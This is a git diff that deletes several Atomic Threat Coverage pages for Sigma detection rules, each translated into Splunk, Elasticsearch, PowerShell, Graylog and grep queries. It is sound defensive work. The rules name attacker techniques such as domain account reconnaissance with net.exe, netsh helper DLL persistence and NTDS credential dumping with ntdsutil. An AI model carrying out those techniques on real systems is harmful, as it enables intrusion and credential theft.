-            - '\winword.exe'
-            - '\excel.exe'
-        CommandLine|contains: 'http'
-    condition: selection
-falsepositives:
-    - Unknown
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\powerpnt.exe" -or $_.message -match "Image.*.*\\winword.exe" -or $_.message -match "Image.*.*\\excel.exe") -and $_.message -match "CommandLine.*.*http.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\powerpnt.exe OR *\\winword.exe OR *\\excel.exe) AND winlog.event_data.CommandLine.keyword:*http*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/0c79148b-118e-472b-bdb7-9b57b444cc19 <<EOF
-{
-  "metadata": {
-    "title": "Malicious Payload Download via Office Binaries",
-    "description": "Downloads payload from remote server",
-    "tags": [
-      "attack.command_and_control",
-      "attack.t1105"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\powerpnt.exe OR *\\\\winword.exe OR *\\\\excel.exe) AND winlog.event_data.CommandLine.keyword:*http*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\powerpnt.exe OR *\\\\winword.exe OR *\\\\excel.exe) AND winlog.event_data.CommandLine.keyword:*http*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Malicious Payload Download via Office Binaries'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\powerpnt.exe *\\winword.exe *\\excel.exe) AND CommandLine.keyword:*http*)
-```
-
-
-### splunk
-    
-```
-((Image="*\\powerpnt.exe" OR Image="*\\winword.exe" OR Image="*\\excel.exe") CommandLine="*http*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\powerpnt.exe", "*\\winword.exe", "*\\excel.exe"] CommandLine="*http*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\powerpnt\.exe|.*.*\winword\.exe|.*.*\excel\.exe))(?=.*.*http.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_net_execution.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_net_execution.md
deleted file mode 100644
index 21654e5..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_net_execution.md
+++ /dev/null
@@ -1,206 +0,0 @@
-| Title                    | Net.exe Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Detects execution of Net.exe, whether suspicious or benign. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1027: Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)</li><li>[T1049: System Network Connections Discovery](https://attack.mitre.org/techniques/T1049)</li><li>[T1077: Windows Admin Shares](https://attack.mitre.org/techniques/T1077)</li><li>[T1135: Network Share Discovery](https://attack.mitre.org/techniques/T1135)</li><li>[T1021: Remote Services](https://attack.mitre.org/techniques/T1021)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1027: Obfuscated Files or Information](../Triggers/T1027.md)</li><li>[T1049: System Network Connections Discovery](../Triggers/T1049.md)</li><li>[T1135: Network Share Discovery](../Triggers/T1135.md)</li></ul>  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine.</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/](https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/)</li><li>[https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html](https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html)</li><li>[https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html](https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html)</li><li>[https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html](https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html)</li></ul>  |
-| **Author**               | Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements) |
-| Other Tags           | <ul><li>attack.s0039</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Net.exe Execution
-id: 183e7ea8-ac4b-4c23-9aec-b3dac4e401ac
-status: experimental
-description: Detects execution of Net.exe, whether suspicious or benign.
-references:
-    - https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
-    - https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html
-    - https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html
-    - https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html
-author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)
-date: 2019/01/16
-tags:
-    - attack.s0039
-    - attack.t1027
-    - attack.t1049
-    - attack.t1077
-    - attack.t1135
-    - attack.lateral_movement
-    - attack.discovery
-    - attack.defense_evasion
-    - attack.t1021
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image:
-            - '*\net.exe'
-            - '*\net1.exe'
-    cmdline:
-        CommandLine:
-            - '* group*'
-            - '* localgroup*'
-            - '* user*'
-            - '* view*'
-            - '* share'
-            - '* accounts*'
-            - '* use*'
-            - '* stop *'
-    condition: selection and cmdline
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine.
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\net.exe" -or $_.message -match "Image.*.*\\net1.exe") -and ($_.message -match "CommandLine.*.* group.*" -or $_.message -match "CommandLine.*.* localgroup.*" -or $_.message -match "CommandLine.*.* user.*" -or $_.message -match "CommandLine.*.* view.*" -or $_.message -match "CommandLine.*.* share" -or $_.message -match "CommandLine.*.* accounts.*" -or $_.message -match "CommandLine.*.* use.*" -or $_.message -match "CommandLine.*.* stop .*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\net.exe OR *\\net1.exe) AND winlog.event_data.CommandLine.keyword:(*\ group* OR *\ localgroup* OR *\ user* OR *\ view* OR *\ share OR *\ accounts* OR *\ use* OR *\ stop\ *))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/183e7ea8-ac4b-4c23-9aec-b3dac4e401ac <<EOF
-{
-  "metadata": {
-    "title": "Net.exe Execution",
-    "description": "Detects execution of Net.exe, whether suspicious or benign.",
-    "tags": [
-      "attack.s0039",
-      "attack.t1027",
-      "attack.t1049",
-      "attack.t1077",
-      "attack.t1135",
-      "attack.lateral_movement",
-      "attack.discovery",
-      "attack.defense_evasion",
-      "attack.t1021"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\net.exe OR *\\\\net1.exe) AND winlog.event_data.CommandLine.keyword:(*\\ group* OR *\\ localgroup* OR *\\ user* OR *\\ view* OR *\\ share OR *\\ accounts* OR *\\ use* OR *\\ stop\\ *))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\net.exe OR *\\\\net1.exe) AND winlog.event_data.CommandLine.keyword:(*\\ group* OR *\\ localgroup* OR *\\ user* OR *\\ view* OR *\\ share OR *\\ accounts* OR *\\ use* OR *\\ stop\\ *))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Net.exe Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n     ComputerName = {{_source.ComputerName}}\n             User = {{_source.User}}\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\net.exe *\\net1.exe) AND CommandLine.keyword:(* group* * localgroup* * user* * view* * share * accounts* * use* * stop *))
-```
-
-
-### splunk
-    
-```
-((Image="*\\net.exe" OR Image="*\\net1.exe") (CommandLine="* group*" OR CommandLine="* localgroup*" OR CommandLine="* user*" OR CommandLine="* view*" OR CommandLine="* share" OR CommandLine="* accounts*" OR CommandLine="* use*" OR CommandLine="* stop *")) | table ComputerName,User,CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\net.exe", "*\\net1.exe"] CommandLine IN ["* group*", "* localgroup*", "* user*", "* view*", "* share", "* accounts*", "* use*", "* stop *"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\net\.exe|.*.*\net1\.exe))(?=.*(?:.*.* group.*|.*.* localgroup.*|.*.* user.*|.*.* view.*|.*.* share|.*.* accounts.*|.*.* use.*|.*.* stop .*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_net_recon_activity.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_net_recon_activity.md
deleted file mode 100644
index 35dba05..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_net_recon_activity.md
+++ /dev/null
@@ -1,185 +0,0 @@
-| Title                    | Reconnaissance Activity       |
-|:-------------------------|:------------------|
-| **Description**          | Detects activity as "net user administrator /domain" and "net group domain admins /domain" |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1087: Account Discovery](https://attack.mitre.org/techniques/T1087)</li><li>[T1069: Permission Groups Discovery](https://attack.mitre.org/techniques/T1069)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Administrator activity</li><li>Penetration tests</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html](https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html)</li></ul>  |
-| **Author**               | Florian Roth (rule), Jack Croock (method) |
-| Other Tags           | <ul><li>attack.s0039</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Reconnaissance Activity
-id: 968eef52-9cff-4454-8992-1e74b9cbad6c
-status: experimental
-description: Detects activity as "net user administrator /domain" and "net group domain admins /domain"
-references:
-    - https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html
-author: Florian Roth (rule), Jack Croock (method)
-date: 2017/03/07
-tags:
-    - attack.discovery
-    - attack.t1087
-    - attack.t1069
-    - attack.s0039
-logsource:
-    product: windows
-    service: security
-    definition: The volume of Event ID 4661 is high on Domain Controllers and therefore "Audit SAM" and "Audit Kernel Object" advanced audit policy settings are not configured in the recommendations for server systems
-detection:
-    selection:
-        - EventID: 4661
-          ObjectType: 'SAM_USER'
-          ObjectName: 'S-1-5-21-*-500'
-          AccessMask: '0x2d'
-        - EventID: 4661
-          ObjectType: 'SAM_GROUP'
-          ObjectName: 'S-1-5-21-*-512'
-          AccessMask: '0x2d'
-    condition: selection
-falsepositives:
-    - Administrator activity
-    - Penetration tests
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4661" -and $_.message -match "AccessMask.*0x2d" -and (($_.message -match "ObjectType.*SAM_USER" -and $_.message -match "ObjectName.*S-1-5-21-.*-500") -or ($_.message -match "ObjectType.*SAM_GROUP" -and $_.message -match "ObjectName.*S-1-5-21-.*-512"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4661" AND winlog.event_data.AccessMask:"0x2d" AND ((winlog.event_data.ObjectType:"SAM_USER" AND winlog.event_data.ObjectName.keyword:S\-1\-5\-21\-*\-500) OR (winlog.event_data.ObjectType:"SAM_GROUP" AND winlog.event_data.ObjectName.keyword:S\-1\-5\-21\-*\-512)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/968eef52-9cff-4454-8992-1e74b9cbad6c <<EOF
-{
-  "metadata": {
-    "title": "Reconnaissance Activity",
-    "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"",
-    "tags": [
-      "attack.discovery",
-      "attack.t1087",
-      "attack.t1069",
-      "attack.s0039"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4661\" AND winlog.event_data.AccessMask:\"0x2d\" AND ((winlog.event_data.ObjectType:\"SAM_USER\" AND winlog.event_data.ObjectName.keyword:S\\-1\\-5\\-21\\-*\\-500) OR (winlog.event_data.ObjectType:\"SAM_GROUP\" AND winlog.event_data.ObjectName.keyword:S\\-1\\-5\\-21\\-*\\-512)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4661\" AND winlog.event_data.AccessMask:\"0x2d\" AND ((winlog.event_data.ObjectType:\"SAM_USER\" AND winlog.event_data.ObjectName.keyword:S\\-1\\-5\\-21\\-*\\-500) OR (winlog.event_data.ObjectType:\"SAM_GROUP\" AND winlog.event_data.ObjectName.keyword:S\\-1\\-5\\-21\\-*\\-512)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Reconnaissance Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4661" AND AccessMask:"0x2d" AND ((ObjectType:"SAM_USER" AND ObjectName.keyword:S\-1\-5\-21\-*\-500) OR (ObjectType:"SAM_GROUP" AND ObjectName.keyword:S\-1\-5\-21\-*\-512)))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4661" AccessMask="0x2d" ((ObjectType="SAM_USER" ObjectName="S-1-5-21-*-500") OR (ObjectType="SAM_GROUP" ObjectName="S-1-5-21-*-512")))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4661" AccessMask="0x2d" ((ObjectType="SAM_USER" ObjectName="S-1-5-21-*-500") OR (ObjectType="SAM_GROUP" ObjectName="S-1-5-21-*-512")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4661)(?=.*0x2d)(?=.*(?:.*(?:.*(?:.*(?=.*SAM_USER)(?=.*S-1-5-21-.*-500))|.*(?:.*(?=.*SAM_GROUP)(?=.*S-1-5-21-.*-512))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_netsh_dll_persistence.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_netsh_dll_persistence.md
deleted file mode 100644
index b11178d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_netsh_dll_persistence.md
+++ /dev/null
@@ -1,183 +0,0 @@
-| Title                    | Suspicious Netsh DLL Persistence       |
-|:-------------------------|:------------------|
-| **Description**          | Detects persitence via netsh helper |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1128: Netsh Helper DLL](https://attack.mitre.org/techniques/T1128)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | testing |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1128/T1128.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1128/T1128.md)</li></ul>  |
-| **Author**               | Victor Sergeev, oscd.community |
-| Other Tags           | <ul><li>attack.t1546.007</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Netsh DLL Persistence
-id: 56321594-9087-49d9-bf10-524fe8479452
-description: Detects persitence via netsh helper
-status: testing
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1128/T1128.md
-tags:
-    - attack.persistence
-    - attack.t1128
-    - attack.t1546.007
-date: 2019/10/25
-modified: 2019/10/25
-author: Victor Sergeev, oscd.community
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: '\netsh.exe'
-        CommandLine|contains|all:
-            - 'add'
-            - 'helper'
-    condition: selection
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\netsh.exe" -and $_.message -match "CommandLine.*.*add.*" -and $_.message -match "CommandLine.*.*helper.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\netsh.exe AND winlog.event_data.CommandLine.keyword:*add* AND winlog.event_data.CommandLine.keyword:*helper*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/56321594-9087-49d9-bf10-524fe8479452 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Netsh DLL Persistence",
-    "description": "Detects persitence via netsh helper",
-    "tags": [
-      "attack.persistence",
-      "attack.t1128",
-      "attack.t1546.007"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\netsh.exe AND winlog.event_data.CommandLine.keyword:*add* AND winlog.event_data.CommandLine.keyword:*helper*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\netsh.exe AND winlog.event_data.CommandLine.keyword:*add* AND winlog.event_data.CommandLine.keyword:*helper*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Netsh DLL Persistence'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n     ComputerName = {{_source.ComputerName}}\n             User = {{_source.User}}\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\netsh.exe AND CommandLine.keyword:*add* AND CommandLine.keyword:*helper*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\netsh.exe" CommandLine="*add*" CommandLine="*helper*") | table ComputerName,User,CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\netsh.exe" CommandLine="*add*" CommandLine="*helper*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\netsh\.exe)(?=.*.*add.*)(?=.*.*helper.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_ntdsutil.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_ntdsutil.md
deleted file mode 100644
index b492089..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_ntdsutil.md
+++ /dev/null
@@ -1,174 +0,0 @@
-| Title                    | Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)       |
-|:-------------------------|:------------------|
-| **Description**          | Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>NTDS maintenance</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm](https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm)</li></ul>  |
-| **Author**               | Thomas Patzke |
-| Other Tags           | <ul><li>attack.t1003.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)
-id: 2afafd61-6aae-4df4-baed-139fa1f4c345
-description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
-status: experimental
-references:
-    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm
-author: Thomas Patzke
-date: 2019/01/16
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1003.003
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine: '*\ntdsutil*'
-    condition: selection
-falsepositives:
-    - NTDS maintenance
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*\\ntdsutil.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:*\\ntdsutil*
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/2afafd61-6aae-4df4-baed-139fa1f4c345 <<EOF
-{
-  "metadata": {
-    "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)",
-    "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.003"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:*\\\\ntdsutil*"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:*\\\\ntdsutil*",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:*\\ntdsutil*
-```
-
-
-### splunk
-    
-```
-CommandLine="*\\ntdsutil*"
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*\\ntdsutil*")
-```
-
-
-### grep
-    
-```
-grep -P '^.*\ntdsutil.*'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_ntlm_auth.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_ntlm_auth.md
deleted file mode 100644
index e9e73e1..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_ntlm_auth.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | NTLM Logon       |
-|:-------------------------|:------------------|
-| **Description**          | Detects logons using NTLM, which could be caused by a legacy source or attackers |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1075: Pass the Hash](https://attack.mitre.org/techniques/T1075)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Legacy hosts</li></ul>  |
-| **Development Status**   | experimental |
